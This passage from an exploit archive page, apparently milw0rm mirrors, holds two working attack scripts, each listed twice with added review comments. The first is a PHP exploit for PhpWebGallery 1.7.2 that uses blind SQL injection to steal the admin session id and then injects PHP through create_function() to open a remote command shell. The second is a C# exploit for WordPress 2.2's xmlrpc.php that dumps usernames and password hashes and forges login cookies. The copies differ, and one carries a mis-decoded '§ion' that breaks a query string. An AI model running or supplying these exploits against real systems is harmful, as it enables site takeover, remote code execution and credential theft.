        $sock = fsockopen($host, 80);
        if (!$sock) {
            print "\n[-] No response from {$host}:80 Trying again...\n";
        }
    } while (!$sock);
    fwrite($sock, $packet);
    $resp = stream_get_contents($sock);
    fclose($sock);
    return $resp;
}
/**
 * Probe the `sort_by` parameter of comments.php and fill two globals used by get_sid():
 *  - $prefix: the table prefix, scraped from the "FROM ...image_category" fragment that the page
 *    apparently echoes from a SQL error when the sort column is invalid;
 *  - $default_record: the author shown first when rows are sorted by id.
 * Dies when nothing was captured or when sorting by author yields the same first row — i.e. the
 * parameter is not reaching ORDER BY unfiltered (this is the "at least two rows" requirement).
 * Root cause on the server: an ORDER BY column taken verbatim from the query string plus a verbose
 * SQL error shown to the client; the fix is a fixed allow-list of sort columns and no error display.
 * Uses globals $host and $path; sends a throw-away session cookie. No return value.
 */
function check_target()
{
global $host, $path, $prefix, $default_record;
$packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id=".md5("foo")."\r\n";
$packet .= "Connection: close\r\n\r\n";
preg_match("/FROM (.*)image_category/", http_send($host, sprintf($packet, "foo")), $match);
$prefix = $match[1];
preg_match(PATTERN, http_send($host, sprintf($packet, "id/**/LIMIT/**/1/*")), $match);
$default_record = $match[1];
preg_match(PATTERN, http_send($host, sprintf($packet, "author/**/LIMIT/**/1/*")), $match);
if (!strlen($default_record) || $default_record == $match[1]) die("\n[-] Exploit failed...\n");
}
/**
 * Express a string as a MySQL hex literal wrapped in CONCAT(), e.g. "ab" -> "CONCAT(0x6162)".
 * Each byte is emitted with dechex(), i.e. without zero padding (a byte below 0x10 yields a
 * single digit, exactly as the original did). An empty string yields "CONCAT(0x)".
 *
 * @param string $sql bytes to encode
 * @return string SQL expression
 */
function encodeSQL($sql)
{
    $hex = '';
    $len = strlen($sql);
    for ($pos = 0; $pos < $len; ++$pos) {
        $hex .= dechex(ord($sql[$pos]));
    }
    return sprintf('CONCAT(0x%s)', $hex);
}
/**
 * Recover the admin session id one character at a time through boolean blind SQL injection in
 * comments.php's sort_by parameter.
 * The injected sub-select returns `author` when the $index-th byte of the session id equals the
 * candidate and `id` otherwise, so the first rendered row (PATTERN capture) differs from
 * $default_record exactly on a match. The candidate set is NUL plus '0'-'9' and 'a'-'f'; NUL is the
 * end-of-string sentinel (SUBSTR past the end has ASCII 0) and ends the outer loop via
 * strpos($sid, chr(0)) — the returned id therefore carries a trailing NUL byte.
 * The session row is selected by its serialised data containing "pwg_uid|i:1;" (apparently the
 * session of user id 1, the admin — confirm). Dies when no candidate matches at some position.
 * Detection on the server: comments.php requests whose sort_by holds SELECT/SUBSTR/LIMIT tokens or
 * the "/**" + "/" comment filler used here.
 * Uses globals $host, $path, $prefix, $default_record.
 *
 * @return string session id followed by chr(0)
 */
function get_sid()
{
global $host, $path, $prefix, $default_record;
$chars = array_merge(array(0), range(48, 57), range(97, 102)); // NUL, '0'-'9', 'a'-'f'
$index = 1;
$sid = "";
$packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id=".md5("foo")."\r\n";
$packet .= "Connection: close\r\n\r\n";
print "\n[-] Fetching admin SID: ";
while (!strpos($sid, chr(0)))
{
// $i runs to $n inclusive so the exhaustion case can be reported before indexing past the array.
for ($i = 0, $n = count($chars); $i <= $n; $i++)
{
if ($i == $n) die("\n\n[-] Exploit failed...try later!\n");
$sql = "(SELECT/**/IF(ASCII(SUBSTR(id,{$index},1))={$chars[$i]},author,id)/**/FROM/**/{$prefix}sessions".
"/**/WHERE/**/data/**/LIKE/**/".encodeSQL("pwg_uid|i:1;")."/**/LIMIT/**/1)/**/LIMIT/**/1/*";
preg_match(PATTERN, http_send($host, sprintf($packet, $sql)), $match);
if ($match[1] != $default_record) { $sid .= chr($chars[$i]); print chr($chars[$i]); break; }
}
$index++;
}
print "\n";
return $sid;
}
/**
 * Ensure the event_tracer plugin — the one containing the create_function() sink quoted in the
 * header — is installed and active, using the hijacked admin session cookie.
 * Uses globals $host, $path, $sid. No return value.
 * NOTE(review): "§ion" in the first request below is a mis-decoded "&section" (the "&sect" prefix
 * was rendered as the HTML entity §); compare the second copy of this listing on this page. As
 * written the query string is broken and the "not active" check most likely never matches.
 */
function check_plugin()
{
global $host, $path, $sid;
$packet = "GET {$path}%s HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id={$sid}\r\n";
$packet .= "Connection: close\r\n\r\n";
// check if the event_tracer plugin isn't installed
if (preg_match("/not active/", http_send($host, sprintf($packet, "admin.php?page=plugin§ion=event_tracer/event_list.php"))))
{
http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=install"));
http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=activate"));
}
}
print "\n+---------------------------------------------------------------------------+";
print "\n| PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------------+\n";
// Usage: host, path and optionally a known admin session id (which skips get_sid()).
if ($argc < 3)
{
print "\nUsage...: php $argv[0] host path [sid]\n";
print "\nhost....: target server (ip/hostname)";
print "\npath....: path to PhpWebGallery directory";
print "\nsid.....: a valid admin session id\n";
die();
}
$host = $argv[1];
$path = $argv[2];
// Step 1: confirm the sort_by injection and learn the table prefix.
check_target();
// Step 2: obtain an admin session id — supplied on the command line or extracted blindly.
$sid = (isset($argv[3])) ? $argv[3] : get_sid();
// Step 3: make sure the vulnerable plugin page exists and is active.
check_plugin();
// Payload for $_GET['sort'], which event_list.php splices into a create_function() body (see the
// vulnerable lines quoted in the header): "0];}" closes the array index and the function body, so
// the statements that follow execute when create_function() evaluates the string; "%%23" becomes
// "%23" after sprintf(), i.e. "#", commenting out the rest. The command travels in a custom "Cmd:"
// request header and is read back through $_SERVER['HTTP_CMD'].
// Root cause: untrusted input concatenated into dynamically compiled code. Application-side fix:
// validate `sort` as an integer column index (create_function itself no longer exists in PHP 8).
// NOTE(review): "§ion" below is a mis-decoded "&section", as in check_plugin().
$code = "0];}error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die;%%23";
$packet = "GET {$path}admin.php?page=plugin§ion=event_tracer/event_list.php&sort={$code} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id={$sid}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
// Interactive loop: one request per input line; "_code_" in the response marks that the injected
// code ran, and the text after the last marker is printed.
while(1)
{
print "\nphpwebgallery-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
}
else break;
}
?>
# milw0rm.com [2008-10-14]
EgiX/phpwebgallery-hijackexec.txt ( na)
<?php
/*
------------------------------------------------------------------------
PhpWebGallery <= 1.7.2 Remote Session Hijacking / Code Execution Exploit
------------------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.phpwebgallery.net/
details..: works with at least two rows in _comments table
This PoC was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
[-] vulnerable code in /plugins/event_tracer/event_list.php
60. $sort= isset($_GET['sort']) ? $_GET['sort'] : 1;
61. usort(
62. $events,
63. create_function( '$a,$b', 'return $a['.$sort.']>$b['.$sort.'];' )
64. );
An attacker could be able to inject and execute PHP code through $_GET['sort'], that is passed
to create_function() at line 63 (see http://www.securityfocus.com/bid/31398). Only admin can
access to the plugins management interface, but the attacker might be able to retrieve a valid
admin session id using the SQL injection bug in comments.php (see lines 325-340)
*/
// Silence every notice/warning (several would otherwise print: undefined variables, define() misuse).
error_reporting(0);
set_time_limit(0);
// Read timeout, in seconds, for the fsockopen()/fread() calls in http_send().
ini_set("default_socket_timeout",5);
// Bare constant names are passed to define(). On the CLI, STDIN is already a predefined resource
// constant, so this define() fails (hidden by error_reporting(0)) and fgets(STDIN) below uses the
// built-in handle. PATTERN is undefined: PHP 5/7 treat the bare name as the string 'PATTERN'
// (with a notice), while PHP 8 raises an Error — so this script needs PHP 5/7. — confirm
define(STDIN, fopen("php://stdin", "r"));
// Regex for the comment author cell rendered by comments.php; the blind-SQLi oracle below
// compares what lands in this capture.
define(PATTERN, "/<span class=\"author\">(.*)<\/span> -/");
/**
 * Send one raw HTTP request to $host:80 and return the complete raw response (headers + body).
 * Retries the TCP connect without any cap until it succeeds, then reads to EOF — so the request
 * text must carry "Connection: close" (every caller does).
 *
 * @param string $host   target host name or IP
 * @param string $packet complete request text including the terminating blank line
 * @return string raw response
 */
function http_send($host, $packet)
{
    do {
        $sock = fsockopen($host, 80);
        if (!$sock) {
            print "\n[-] No response from {$host}:80 Trying again...\n";
        }
    } while (!$sock);
    fwrite($sock, $packet);
    $resp = stream_get_contents($sock);
    fclose($sock);
    return $resp;
}
/**
 * Probe the `sort_by` parameter of comments.php and fill two globals used by get_sid():
 *  - $prefix: the table prefix, scraped from the "FROM ...image_category" fragment that the page
 *    apparently echoes from a SQL error when the sort column is invalid;
 *  - $default_record: the author shown first when rows are sorted by id.
 * Dies when nothing was captured or when sorting by author yields the same first row — i.e. the
 * parameter is not reaching ORDER BY unfiltered (this is the "at least two rows" requirement).
 * Root cause on the server: an ORDER BY column taken verbatim from the query string plus a verbose
 * SQL error shown to the client; the fix is a fixed allow-list of sort columns and no error display.
 * Uses globals $host and $path; sends a throw-away session cookie. No return value.
 */
function check_target()
{
global $host, $path, $prefix, $default_record;
$packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id=".md5("foo")."\r\n";
$packet .= "Connection: close\r\n\r\n";
preg_match("/FROM (.*)image_category/", http_send($host, sprintf($packet, "foo")), $match);
$prefix = $match[1];
preg_match(PATTERN, http_send($host, sprintf($packet, "id/**/LIMIT/**/1/*")), $match);
$default_record = $match[1];
preg_match(PATTERN, http_send($host, sprintf($packet, "author/**/LIMIT/**/1/*")), $match);
if (!strlen($default_record) || $default_record == $match[1]) die("\n[-] Exploit failed...\n");
}
/**
 * Express a string as a MySQL hex literal wrapped in CONCAT(), e.g. "ab" -> "CONCAT(0x6162)".
 * Each byte is emitted with dechex(), i.e. without zero padding (a byte below 0x10 yields a
 * single digit, exactly as the original did). An empty string yields "CONCAT(0x)".
 *
 * @param string $sql bytes to encode
 * @return string SQL expression
 */
function encodeSQL($sql)
{
    $hex = '';
    $len = strlen($sql);
    for ($pos = 0; $pos < $len; ++$pos) {
        $hex .= dechex(ord($sql[$pos]));
    }
    return sprintf('CONCAT(0x%s)', $hex);
}
/**
 * Recover the admin session id one character at a time through boolean blind SQL injection in
 * comments.php's sort_by parameter.
 * The injected sub-select returns `author` when the $index-th byte of the session id equals the
 * candidate and `id` otherwise, so the first rendered row (PATTERN capture) differs from
 * $default_record exactly on a match. The candidate set is NUL plus '0'-'9' and 'a'-'f'; NUL is the
 * end-of-string sentinel (SUBSTR past the end has ASCII 0) and ends the outer loop via
 * strpos($sid, chr(0)) — the returned id therefore carries a trailing NUL byte.
 * The session row is selected by its serialised data containing "pwg_uid|i:1;" (apparently the
 * session of user id 1, the admin — confirm). Dies when no candidate matches at some position.
 * Detection on the server: comments.php requests whose sort_by holds SELECT/SUBSTR/LIMIT tokens or
 * the "/**" + "/" comment filler used here.
 * Uses globals $host, $path, $prefix, $default_record.
 *
 * @return string session id followed by chr(0)
 */
function get_sid()
{
global $host, $path, $prefix, $default_record;
$chars = array_merge(array(0), range(48, 57), range(97, 102)); // NUL, '0'-'9', 'a'-'f'
$index = 1;
$sid = "";
$packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id=".md5("foo")."\r\n";
$packet .= "Connection: close\r\n\r\n";
print "\n[-] Fetching admin SID: ";
while (!strpos($sid, chr(0)))
{
// $i runs to $n inclusive so the exhaustion case can be reported before indexing past the array.
for ($i = 0, $n = count($chars); $i <= $n; $i++)
{
if ($i == $n) die("\n\n[-] Exploit failed...try later!\n");
$sql = "(SELECT/**/IF(ASCII(SUBSTR(id,{$index},1))={$chars[$i]},author,id)/**/FROM/**/{$prefix}sessions".
"/**/WHERE/**/data/**/LIKE/**/".encodeSQL("pwg_uid|i:1;")."/**/LIMIT/**/1)/**/LIMIT/**/1/*";
preg_match(PATTERN, http_send($host, sprintf($packet, $sql)), $match);
if ($match[1] != $default_record) { $sid .= chr($chars[$i]); print chr($chars[$i]); break; }
}
$index++;
}
print "\n";
return $sid;
}
/**
 * Ensure the event_tracer plugin — the one containing the create_function() sink quoted in the
 * header — is installed and active, using the hijacked admin session cookie.
 * The first request renders the plugin page; if it reports "not active", the install and activate
 * admin actions are issued in turn.
 * Uses globals $host, $path, $sid. No return value.
 */
function check_plugin()
{
global $host, $path, $sid;
$packet = "GET {$path}%s HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id={$sid}\r\n";
$packet .= "Connection: close\r\n\r\n";
// check if the event_tracer plugin isn't installed
if (preg_match("/not active/", http_send($host, sprintf($packet, "admin.php?page=plugin&section=event_tracer/event_list.php"))))
{
http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=install"));
http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=activate"));
}
}
print "\n+---------------------------------------------------------------------------+";
print "\n| PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------------+\n";
// Usage: host, path and optionally a known admin session id (which skips get_sid()).
if ($argc < 3)
{
print "\nUsage...: php $argv[0] host path [sid]\n";
print "\nhost....: target server (ip/hostname)";
print "\npath....: path to PhpWebGallery directory";
print "\nsid.....: a valid admin session id\n";
die();
}
$host = $argv[1];
$path = $argv[2];
// Step 1: confirm the sort_by injection and learn the table prefix.
check_target();
// Step 2: obtain an admin session id — supplied on the command line or extracted blindly.
$sid = (isset($argv[3])) ? $argv[3] : get_sid();
// Step 3: make sure the vulnerable plugin page exists and is active.
check_plugin();
// Payload for $_GET['sort'], which event_list.php splices into a create_function() body (see the
// vulnerable lines quoted in the header): "0];}" closes the array index and the function body, so
// the statements that follow execute when create_function() evaluates the string; "%%23" becomes
// "%23" after sprintf(), i.e. "#", commenting out the rest. The command travels in a custom "Cmd:"
// request header and is read back through $_SERVER['HTTP_CMD'].
// Root cause: untrusted input concatenated into dynamically compiled code. Application-side fix:
// validate `sort` as an integer column index (create_function itself no longer exists in PHP 8).
$code = "0];}error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die;%%23";
$packet = "GET {$path}admin.php?page=plugin&section=event_tracer/event_list.php&sort={$code} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id={$sid}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
// Interactive loop: one request per input line; "_code_" in the response marks that the injected
// code ran, and the text after the last marker is printed.
while(1)
{
print "\nphpwebgallery-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
}
else break;
}
?>
PHP Web Gallery versions 1.7.2 and below session hijacking and code execution exploit.
Slappter/Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit ( php)
/*
El error, bastante tonto por cierto, se encuentra en la función wp_suggestCategories, en el archivo xmlrpc.php:
function wp_suggestCategories($args) {
global $wpdb;
$this->escape($args);
$blog_id = (int) $args[0];
$username = $args[1];
$password = $args[2];
$category = $args[3];
$max_results = $args[4];
if(!$this->login_pass_ok($username, $password)) {
return($this->error);
}
// Only set a limit if one was provided.
$limit = "";
if(!empty($max_results)) {
$limit = "LIMIT {$max_results}";
}
$category_suggestions = $wpdb->get_results("
SELECT cat_ID category_id,
cat_name category_name
FROM {$wpdb->categories}
WHERE cat_name LIKE '{$category}%'
{$limit}
");
return($category_suggestions);
}
Como se puede observar en la porción de código, no se hace una conversión a entero del valor de $max_results, por lo que es posible enviar valores del tipo 0 UNION ALL SELECT user_login, user_pass FROM wp_users. Para que un atacante logre su objetivo, es necesario que éste tenga una cuenta de usuario válida (una cuenta de tipo subscriber basta y sobra) en el sitio víctima.
Preparé un pequeño exploit (Creditos: Alex) que devuelve la lista de usuarios con sus respectivas contraseñas en MD5, además también incluye las cookies de autenticación para cada usuario.
Credits: Alex de la Concha
code c sharp:
*/
using System;
using System.Net;
using System.Text;
using System.Xml;
using System.Text.RegularExpressions;
using System.Security.Cryptography;
/// <summary>
/// Demonstrates the unsanitised LIMIT clause in WordPress 2.2's wp.suggestCategories XML-RPC method
/// (see the PHP quoted above): the fifth parameter is used verbatim as the LIMIT value, so a UNION
/// selecting user_login/user_pass is returned in place of category rows. A valid low-privilege
/// account is required because login_pass_ok() runs first. The WordPress-side fix is the (int)
/// cast mentioned at the end of this listing.
/// </summary>
class Program
{
static void Main(string[] args)
{
// Hard-coded target and credentials; edit before running.
string targetUrl = "http://localhost/wp/";
string login = "alex";
string password = "1234";
// XML-RPC body; {0}/{1} are the credentials, {2} the table prefix tried for the users table.
string data = @"<methodCall>
<methodName>wp.suggestCategories</methodName>
<params>
<param><value>1</value></param>
<param><value>{0}</value></param>
<param><value>{1}</value></param>
<param><value>1</value></param>
<param><value>0 UNION ALL SELECT user_login, user_pass FROM {2}users</value></param>
</params>
</methodCall>";
string cookieHash = GetCookieHash(targetUrl);
using (WebClient request = new WebClient())
{
/* First try the default prefix; when that fails, the error text leaks the real
 * prefix in "FROM <prefix>categories" and a second request is issued with it. */
string response = request.UploadString(targetUrl + "xmlrpc.php",
string.Format(data, login, password, "wp_svn_"));
/* Issue a second request if the previous query failed */
Match match = Regex.Match(response, @"FROM\s+(.*?)categories\s+");
if (match.Success)
{
// NOTE(review): the trailing space in "xmlrpc.php " looks unintended.
response = request.UploadString(targetUrl + "xmlrpc.php ",
string.Format(data, login, password, match.Groups[1].Value));
}
try
{
XmlDocument doc = new XmlDocument();
doc.LoadXml(response);
// Every <struct> member value in document order; a <fault> element means the call failed.
XmlNodeList nodes = doc.SelectNodes("//struct/member/value");
if (nodes != null && doc.SelectSingleNode("/methodResponse/fault") == null)
{
string user, pass;
/* Print, per row:
 *   user  md5(password)
 *   authentication cookie
 */
// Each user contributes two consecutive <value> nodes (login, stored hash).
// NOTE(review): the bound is nodes.Count / 2 + 1 rather than nodes.Count, so with more
// than two users the later pairs are never printed.
for (int i = 0; i < nodes.Count / 2 + 1; i += 2)
{
user = nodes.Item(i).InnerText;
pass = nodes.Item(i + 1).InnerText;
Console.WriteLine("Usuario: {0}\tMD5(Contraseña): {1}",
user,
pass);
// WordPress 2.2 cookies: name carries the site hash, value is md5 of the stored hash.
Console.WriteLine("Cookie: wordpressuser_{0}={1};wordpresspass_{0}={2}\n",
cookieHash,
user,
MD5(pass));
}
}
else
{
Console.WriteLine("Error:\n{0}", response);
}
}
catch (Exception ex)
{
Console.WriteLine("Error:\n" + ex.ToString());
}
}
}
/// <summary>
/// Reads the 32-hex-character site hash that WordPress embeds in its cookie names from the
/// Set-Cookie header of the logout page (redirect not followed). Returns "" when no match.
/// NOTE(review): the WebResponse is never closed/disposed, and Headers["Set-Cookie"] is null when
/// the header is absent, which makes Regex.Match throw — confirm.
/// </summary>
private static string GetCookieHash(string targetUrl)
{
WebRequest request = WebRequest.Create(targetUrl + "wp-login.php?action=logout");
request.Method = "HEAD";
(request as HttpWebRequest).AllowAutoRedirect = false;
WebResponse response = request.GetResponse();
if (response != null)
{
Match match = Regex.Match(response.Headers["Set-Cookie"],
@"wordpress[a-z]+_([a-z\d]{32})",
RegexOptions.IgnoreCase);
if (match.Success)
return match.Groups[1].Value;
}
return string.Empty;
}
/// <summary>
/// Lowercase hex MD5 of the UTF-8 bytes of <paramref name="password"/>. Used only to reproduce
/// how WordPress 2.2 derived the wordpresspass_ cookie value from the stored hash; MD5 is not a
/// suitable password hash.
/// </summary>
public static string MD5(string password)
{
MD5CryptoServiceProvider x = new MD5CryptoServiceProvider();
byte[] bs = Encoding.UTF8.GetBytes(password);
bs = x.ComputeHash(bs);
StringBuilder s = new StringBuilder();
foreach (byte b in bs)
{
s.Append(b.ToString("x2").ToLower());
}
return s.ToString();
}
}
/*
Para corregir este problema, mientras se liberan actualizaciones para WordPress 2.2, basta con editar el archivo xmlrpc.php y cambiar la línea $max_results = $args[4]; de la función wp_suggestCategories por $max_results = (int) $args[4]; (el cast a entero es la defensa correcta aquí: $this->escape() no protege un valor que se interpola sin comillas en el SQL) o, en su defecto, bloquear el acceso a xmlrpc.php.
Lo malo es que tienes que tener una cuenta, aunque sea con los mínimos permisos, para obtener los demás nombres de usuarios con sus respectivos MD5.
static void Main(string[] args)
{
string targetUrl = "http://localhost/wp/";
string login = "alex";
string password = "1234";
Ahí sería la ruta donde está colocado el WordPress 2.2, tu nombre de usuario y tu contraseña.
Ya se creó un zip con los archivos vulnerables ya reparados [ xmlrpc.php, wp-admin/post-new.php, wp-admin/page-new.php, wp-admin/users-edit.php ].
:: [Slappter] ::
*/
# milw0rm.com [2007-06-06]
Slappter/wp22xmlrpc-sql.txt ( na)
/*
El error, bastante tonto por cierto, se encuentra en la función wp_suggestCategories, en el archivo xmlrpc.php:
function wp_suggestCategories($args) {
global $wpdb;
$this->escape($args);
$blog_id = (int) $args[0];
$username = $args[1];
$password = $args[2];
$category = $args[3];
$max_results = $args[4];
if(!$this->login_pass_ok($username, $password)) {
return($this->error);
}
// Only set a limit if one was provided.
$limit = "";
if(!empty($max_results)) {
$limit = "LIMIT {$max_results}";
}
$category_suggestions = $wpdb->get_results("
SELECT cat_ID category_id,
cat_name category_name
FROM {$wpdb->categories}
WHERE cat_name LIKE '{$category}%'
{$limit}
");
return($category_suggestions);
}
Como se puede observar en la porción de código, no se hace una conversión a entero del valor de $max_results; $this->escape($args) sólo escapa comillas, y como $max_results se concatena sin comillas en la cláusula LIMIT, ese escape no sirve de nada en este punto. Por eso es posible enviar valores del tipo 0 UNION ALL SELECT user_login, user_pass FROM wp_users (el prefijo de tabla puede variar según la instalación). Para que un atacante logre su objetivo, es necesario que tenga una cuenta de usuario válida (una cuenta de tipo subscriber basta y sobra) en el sitio víctima, ya que la consulta sólo se ejecuta después de que login_pass_ok() acepte las credenciales.
Preparé un pequeño exploit (Créditos: Alex) que devuelve la lista de usuarios con sus respectivos hashes MD5 de contraseña y, además, construye para cada usuario la cookie de autenticación (wordpressuser_/wordpresspass_) directamente a partir del hash almacenado, sin necesidad de romperlo; el exploit asume el esquema de cookies de WordPress 2.2 (md5 del hash guardado) y obtiene el sufijo de cookie propio del sitio con una petición HEAD a wp-login.php?action=logout.
code c sharp:
*/
using System;
using System.Net;
using System.Text;
using System.Xml;
using System.Text.RegularExpressions;
using System.Security.Cryptography;
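/// <summary>
/// Proof of concept for the WordPress 2.2 xmlrpc.php wp.suggestCategories SQL
/// injection: the fifth XML-RPC parameter ($max_results) is interpolated
/// unquoted into a LIMIT clause, so any authenticated (subscriber-level) caller
/// can append "0 UNION ALL SELECT user_login, user_pass FROM &lt;prefix&gt;users".
/// The program dumps every user_login / user_pass pair and derives a cookie pair
/// from the stored hash.
/// </summary>
class Program
{
    // Table prefix used for the first request. The original author used
    // "wp_svn_"; a wrong guess is not fatal because the XML-RPC fault text is
    // parsed for the real prefix (see Main), as long as the fault still echoes
    // the failing SQL statement.
    private const string DefaultPrefix = "wp_svn_";

    /// <summary>
    /// Entry point. Logs in over XML-RPC with a low-privilege account, injects
    /// the UNION into LIMIT, and prints each user with its stored MD5 hash and a
    /// wordpressuser_/wordpresspass_ cookie pair built from that hash.
    /// </summary>
    /// <param name="args">Unused; target, login and password are hard-coded below.</param>
    static void Main(string[] args)
    {
        string targetUrl = "http://localhost/wp/";
        string login = "alex";
        string password = "1234";
        // {0}=login, {1}=password, {2}=table prefix. The 4th param ("1") is the
        // category LIKE pattern; the 5th is the injected $max_results.
        string data = @"<methodCall>
<methodName>wp.suggestCategories</methodName>
<params>
<param><value>1</value></param>
<param><value>{0}</value></param>
<param><value>{1}</value></param>
<param><value>1</value></param>
<param><value>0 UNION ALL SELECT user_login, user_pass FROM {2}users</value></param>
</params>
</methodCall>";
        string cookieHash = GetCookieHash(targetUrl);
        using (WebClient client = new WebClient())
        {
            // The original retry used "xmlrpc.php " (trailing space); both
            // requests now go to the same endpoint.
            string endpoint = targetUrl + "xmlrpc.php";

            // First attempt with the guessed prefix.
            string response = client.UploadString(endpoint,
                BuildRequest(data, login, password, DefaultPrefix));

            // If the guess was wrong, the fault message echoes the failing
            // query ("... FROM <prefix>categories ..."), which leaks the real
            // prefix; retry with it. This depends on verbose DB errors being
            // returned in the fault.
            Match prefixMatch = Regex.Match(response, @"FROM\s+(.*?)categories\s+");
            if (prefixMatch.Success)
            {
                response = client.UploadString(endpoint,
                    BuildRequest(data, login, password, prefixMatch.Groups[1].Value));
            }

            try
            {
                XmlDocument doc = new XmlDocument();
                // The response comes from the target; never resolve DTD /
                // external entities it might declare.
                doc.XmlResolver = null;
                doc.LoadXml(response);
                XmlNodeList nodes = doc.SelectNodes("//struct/member/value");
                if (nodes != null && doc.SelectSingleNode("/methodResponse/fault") == null)
                {
                    // Each struct carries (category_id, category_name), which the
                    // UNION turns into (user_login, user_pass); values therefore
                    // arrive in pairs and are walked two at a time. The original
                    // bound (nodes.Count / 2 + 1) stopped early as soon as more
                    // than two rows came back.
                    for (int i = 0; i + 1 < nodes.Count; i += 2)
                    {
                        string user = nodes.Item(i).InnerText;
                        string pass = nodes.Item(i + 1).InnerText;
                        Console.WriteLine("Usuario: {0}\tMD5(Contraseña): {1}",
                            user,
                            pass);
                        // The cookie value is md5(stored hash): the dumped hash
                        // alone is enough to authenticate (pass-the-hash).
                        // NOTE(review): cookie scheme taken from the original
                        // exploit; confirm against WP 2.2's wp-includes/pluggable.php.
                        Console.WriteLine("Cookie: wordpressuser_{0}={1};wordpresspass_{0}={2}\n",
                            cookieHash,
                            user,
                            MD5(pass));
                    }
                }
                else
                {
                    Console.WriteLine("Error:\n{0}", response);
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine("Error:\n" + ex.ToString());
            }
        }
    }

    /// <summary>
    /// Fills the XML-RPC template, XML-escaping every inserted value so that a
    /// login or password containing &amp;, &lt; or quotes cannot break the
    /// request document.
    /// </summary>
    private static string BuildRequest(string template, string login, string password, string prefix)
    {
        return string.Format(template,
            System.Security.SecurityElement.Escape(login),
            System.Security.SecurityElement.Escape(password),
            System.Security.SecurityElement.Escape(prefix));
    }

    /// <summary>
    /// Recovers the 32-hex-character per-site suffix WordPress appends to its
    /// cookie names, by sending a HEAD to wp-login.php?action=logout without
    /// following the redirect and inspecting Set-Cookie.
    /// </summary>
    /// <returns>The suffix, or an empty string when the header is absent or
    /// does not match (the original passed a null header to Regex.Match and threw).</returns>
    private static string GetCookieHash(string targetUrl)
    {
        HttpWebRequest request = (HttpWebRequest)WebRequest.Create(targetUrl + "wp-login.php?action=logout");
        request.Method = "HEAD";
        request.AllowAutoRedirect = false;
        using (WebResponse response = request.GetResponse())
        {
            string setCookie = response.Headers["Set-Cookie"];
            if (string.IsNullOrEmpty(setCookie))
            {
                return string.Empty;
            }
            Match match = Regex.Match(setCookie,
                @"wordpress[a-z]+_([a-z\d]{32})",
                RegexOptions.IgnoreCase);
            return match.Success ? match.Groups[1].Value : string.Empty;
        }
    }

    /// <summary>
    /// Lower-case hex MD5 of the UTF-8 bytes of <paramref name="password"/>.
    /// Kept as MD5 only because that is what the target's cookie scheme uses;
    /// it is not a suitable password hash.
    /// </summary>
    public static string MD5(string password)
    {
        using (System.Security.Cryptography.MD5 md5 = System.Security.Cryptography.MD5.Create())
        {
            byte[] digest = md5.ComputeHash(Encoding.UTF8.GetBytes(password));
            StringBuilder hex = new StringBuilder(digest.Length * 2);
            foreach (byte b in digest)
            {
                hex.Append(b.ToString("x2")); // "x2" is already lower-case
            }
            return hex.ToString();
        }
    }
}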
/*
Para corregir este problema, mientras se liberan actualizaciones para WordPress 2.2, basta con editar el archivo xmlrpc.php y cambiar la línea $max_results = $args[4]; de la función wp_suggestCategories por $max_results = (int) $args[4]; (el cast a entero es la defensa correcta aquí: $this->escape() no protege un valor que se interpola sin comillas en el SQL) o, en su defecto, bloquear el acceso a xmlrpc.php.
Lo malo es que tienes que tener una cuenta, aunque sea con los mínimos permisos, para obtener los demás nombres de usuarios con sus respectivos MD5.
static void Main(string[] args)
{
string targetUrl = "http://localhost/wp/";
string login = "alex";
string password = "1234";
Ahí sería la ruta donde está colocado el WordPress 2.2, tu nombre de usuario y tu contraseña.
Ya se creó un zip con los archivos vulnerables ya reparados [ xmlrpc.php, wp-admin/post-new.php, wp-admin/page-new.php, wp-admin/users-edit.php ].
:: [Slappter] ::
*/
Wordpress version 2.2 remote SQL injection exploit that makes use of xmlrpc.php.